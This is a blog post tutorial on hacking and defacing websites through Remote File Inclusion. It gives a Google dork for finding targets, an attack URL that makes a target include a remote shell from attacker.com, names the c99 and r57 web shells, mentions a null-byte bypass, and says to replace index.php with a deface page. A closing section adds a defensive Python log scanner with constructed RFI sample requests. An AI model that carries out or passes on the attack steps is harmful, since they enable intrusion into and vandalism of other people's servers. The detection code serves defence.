Wednesday, January 24, 2024

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows an attacker to upload malicious code or a malicious file to a website or server. The vulnerability exploits flaws in the different sorts of validation checks a website performs and can lead to code execution on the server or on the website. This time, I will be writing a simple tutorial on Remote File Inclusion, and by the end of the tutorial I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. Not all website hacking is about SQL injection. Using RFI you can literally deface websites, get access to the server and do almost anything with the server. What makes it a red alert for websites is that you only need common sense and a basic knowledge of PHP to execute malicious code. BASH might come in handy, as most servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find an RFI-vulnerable website. Let's see how we can find one.
As we know, finding a vulnerability is the first step in hacking a website or server. So, let's get started: simply go to Google and search for the following query.
inurl: "index.php?page=home"
In place of home, you can also try other pages such as products, gallery, etc.
If you already know an RFI-vulnerable website, then you don't need to find one through Google.
Once we have found it, let's move on to the next step. Let's say we have the following RFI-vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use the PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have put the URL of my malicious code txt file in place of home. You can use any shell for the malicious script, like c99, r57 or any other.
Now, if it's a really vulnerable website, then there are 3 things that can happen.
  1. You might have noticed that the URL containing "page=home" had no extension, but I have included an extension in my URL; hence the site may give an error like 'failure to include maliciousScript.txt'. This might happen because the site may be automatically adding the .txt extension to the pages stored on the server.
  2. In case it automatically appends something along the lines of .php, then we have to use a null byte '' in order to avoid the error.
  3. Successful execution.
Once the code executes successfully, we're good to go with the shell. Now we'll browse the shell for index.php and replace the file with our deface page.
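Seen from the defending side, the requests described above stand out in the web server's access log: a parameter that normally names a local page suddenly carries a full URL, sometimes with a null byte. The following detection sketch is an added example, not code from the original post; it goes beyond the single page=http://... case by undoing repeated percent-encoding before matching. The log lines, the documentation IP addresses and the attacker.example host are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines (Combined Log Format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [24/Jan/2024:10:00:02 +0000] "GET /index.php?page=http://attacker.example/s.txt HTTP/1.1" 200 734',
    '198.51.100.7 - - [24/Jan/2024:10:00:03 +0000] "GET /index.php?page=hTtP%253A%252F%252Fattacker.example%252Fs.txt%2500 HTTP/1.1" 200 811',
]

# A parameter that names a local page should never start with a remote URL scheme.
REMOTE_URL = re.compile(r"\s*(?:https?|ftps?)://", re.IGNORECASE)
# client, method, request target and status from a Combined Log Format line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so double-encoded values are still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_findings(log_line):
    """Return (client, parameter, reason, status) tuples for one log line."""
    match = REQUEST.match(log_line)
    if not match:
        return []  # not a request line we understand; nothing to report
    client, _method, target, status = match.groups()
    findings = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = fully_decode(raw)
        if REMOTE_URL.match(value):
            findings.append((client, name, "remote-url-in-parameter", int(status)))
        if "\x00" in value:
            findings.append((client, name, "null-byte-in-parameter", int(status)))
    return findings


def scan(lines):
    """Flatten the findings for every line of a log."""
    return [finding for line in lines for finding in rfi_findings(line)]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On PHP, a remote include only succeeds when allow_url_include is enabled, which is off by default, so a flagged request answered with status 200 is a reason to check that setting and how the application builds its include path. Parameters that legitimately carry URLs (redirect targets, for instance) will also match and need to be excluded by name.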